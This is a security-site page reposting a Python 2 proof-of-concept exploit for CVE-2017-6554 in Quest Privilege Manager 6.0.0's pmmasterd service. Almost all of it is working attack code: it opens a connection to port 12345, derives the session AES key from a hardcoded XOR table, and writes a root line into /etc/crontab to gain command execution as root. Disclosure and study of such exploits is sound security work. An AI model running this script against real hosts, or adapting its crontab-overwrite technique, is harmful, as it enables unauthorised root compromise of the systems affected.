首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quest Privilege Manager 6.0.0 - Arbitrary File Write
来源:vfocus.net 作者:m0t 发布时间:2017-04-12  
#!/usr/bin/env python2
 
"""
# Exploit Title: Quest Privilege Manager pmmasterd Arbitrary File Write
# Date: 10/Mar/2017
# Exploit Author: m0t
# Vendor Homepage: https://www.quest.com/products/privilege-manager-for-unix/
# Version: 6.0.0-27, 6.0.0-50
# Tested on: ubuntu 14.04 x86_64, ubuntu 16.04 x86, ubuntu 12.04 x86
# CVE : 2017-6554
 
REQUIREMENTS
- Root privs are required to bind a privileged source port
- python hexdump: pip install hexdump
 
 
This PoC gains arbitrary command execution by overwriting /etc/crontab
In case of successful exploitation /etc/crontab will contain the following line
* * * * * root touch /tmp/pwned
 
 
"""
 
import binascii as b
import hexdump as h
import struct
import sys
import socket
from Crypto.Cipher import AES
 
cipher=None
def create_enc_packet(action, len1=None, len2=None, body=None):
    global cipher
    if body == None:
        body_raw = b.unhexlify("50696e6745342e362e302e302e32372e")
    else:
        body_raw = b.unhexlify(body)
        #pad
    if len(body_raw) % 16 != 0:
        body_raw += "\x00" * (16 - (len(body_raw) % 16))
    enc_body = cipher.encrypt(body_raw)
    
    if len1 == None:
        len1 = len(body_raw)
    if len2 == None:
        len2 = len(enc_body)
    head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
    return head+enc_body
 
def decrypt_packet(packet):
    global cipher
    return cipher.decrypt(packet[80:])
 
def create_packet(action, len1=None, len2=None, body=None):
    if body == None:
        body = "50696e6745342e362e302e302e32372e"
    if len1 == None:
        len1 = len(body)/2
    if len2 == None:
        len2 = len1
    head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
    return head+b.unhexlify(body)
 
#extract action code from first 4b, return action found
def get_action(packet):
    code = struct.unpack('>I',packet[:4])[0]
    return code
 
def generate_aes_key(buf):
    some_AES_bytes = [
      0xDF, 0x4E, 0x34, 0x05, 0xF4, 0x4D, 0x19, 0x22, 0x98, 0x4F,
      0x58, 0x62, 0x2C, 0x2A, 0x54, 0x42, 0xAA, 0x76, 0x53, 0xD4,
      0xF9, 0xDC, 0x98, 0x90, 0x23, 0x49, 0x71, 0x12, 0xEA, 0x33,
      0x12, 0x63
    ];
    retbuf = ""
    if len(buf) < 0x20:
        print("[-] initial key buffer too small, that's bad")
        return None
    for i in range(0x20):
        retbuf+= chr(ord(buf[i])^some_AES_bytes[i])
    return retbuf
 
def main():
    global cipher
 
    if len(sys.argv) < 2:
        print("usage: %s <target ip> [<sport>]" % sys.argv[0])
        sys.exit(-1)
 
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
    if len(sys.argv) > 2:
        sport = int(sys.argv[2])
    else:
        sport = 666
 
    s.bind(("0.0.0.0", sport))
    s.connect((sys.argv[1], 12345))
 
 
    try:
        s.send(create_packet(0xfa, body=b.hexlify("/etc/crontab")))
        #s.send(create_packet(0x134))
        print("[+] sent ACT_NEWFILESENT")
        resp=s.recv(1024)
        h.hexdump(resp)
        action=get_action(resp)
        if action == 212:
            print("[+] server returned 212, this is a good sign, press Enter to continue")
        else:
            print("[-] server returned %d, exploit will probably fail, press CTRL-C to exit or Enter to continue" % action)
        sys.stdin.readline()
        print("[+] exchanging DH pars")
        dh="\x00"*63+"\x02"
        s.send(dh)
        dh=s.recv(1024)
        h.hexdump(dh)
        aes_key = generate_aes_key(dh)
        print("[+] got AES key below:")
        h.hexdump(aes_key)
        cipher=AES.new(aes_key)
        print("[+] press Enter to continue")
        sys.stdin.readline()
 
        print("[+] sending:")
        enc=create_enc_packet(0xfb, body=b.hexlify("* * * * * root touch /tmp/pwned\n"))
        h.hexdump(enc)
        s.send(enc )
        enc=create_enc_packet(0xfc, body="")
        h.hexdump(enc)
        s.send(enc )
 
        print("[+] got:")
        resp=s.recv(1024)
        h.hexdump(resp)
        print("[+] trying decrypt")
        h.hexdump(decrypt_packet(resp))
 
        s.close()
    except KeyboardInterrupt:
        s.close()
        exit(-1)
 
main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Multiple Products - XML
·Brother MFC-J6520DW - Authenti
·Proxifier for Mac 2.17 / 2.18
·Apple WebKit / Safari 10.0.3 (
·Wordpress webplayer Plugins SQ
·Apple WebKit / Safari 10.0.3 (
·Moxa MX AOPC-Server 1.5 - XML
·Apple WebKit - 'JSC::B3::Proce
·Moxa MXview 2.8 - Denial of Se
·Apple WebKit - 'Document::adop
·Moxa MXview 2.8 - Private Key
·Apple WebKit - 'JSC::SymbolTab
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved